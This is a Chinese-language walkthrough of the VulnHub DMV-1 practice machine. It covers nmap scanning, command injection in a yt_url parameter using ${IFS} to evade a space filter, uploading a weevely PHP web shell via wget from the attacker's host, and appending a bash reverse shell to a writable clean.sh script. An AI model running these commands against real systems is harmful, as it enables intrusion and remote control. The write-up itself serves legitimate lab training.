VulnHub DMV-1 – 作者:WAFmax

VulnHub DMV-1

搭建靶机查看靶机是否正常运行

1611723058_6010f132eb415de3673da.png!small

主机的发现

nmap 192.168.56.0/24

发现主机地址为192.168.56.101对主机进行详细扫描获取信息

nmap -sV -A -O 192.168.56.101

1611723296_6010f220484f682ecc4d4.png!small

发现开放了22端口与80端口,首先访问80端口进入页面后发现这是一个视频的转码工具

尝试通过抓包查看是否存在可注入的地方

1611723401_6010f289b98e3f9e5b3ce.png!small

发现yt_url存在注入

1611723487_6010f2df7473af418f3b0.png!small

又发现在注入时过滤了空格这里我们可以使用${IFS}代替

1611723590_6010f34641d54f96cb3d3.png!small

1611723638_6010f376c16b50085b2fc.png!small

可以先使用weevely生成一个木马文件在通过wget上传到靶机中

root@kali:~# weevely generate hacker ./shell.php

使用python开启临时端口

python -m SimpleHTTPServer 8080

将shell.php移动到/var/www目录下通过wget命令上传到靶机中

wget${IFS}http://192.168.56.102:8080/shell.php;

1611724118_6010f5566a2598eb0641d.png!small

上传成功通过weevely进行连接

weevely http://192.168.56.101/shell.php hacker

1611724221_6010f5bd1aca7e718ffc8.png!small

在admin目录下找到第一个Flag

1611724270_6010f5eee1df8867e4892.png!small

进入tmp目录发现clean.sh发现,现在的用户可以具有写权限

1611724436_6010f6942f4a228c0396c.png!small

可以通过写入命令进行提权

echo bash -c ‘bash -i >& /dev/tcp/192.168.56.102/4242 0>&1’ >> clean.sh

1611724498_6010f6d221777b900dfe5.png!small

执行./clean.sh通过nc监听端口反弹获取shell,需要等待一段时间才能获取到

1611725641_6010fb4964a9fade4c7f3.png!small

来源:freebuf.com 2021-01-27 13:37:04 by: WAFmax

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论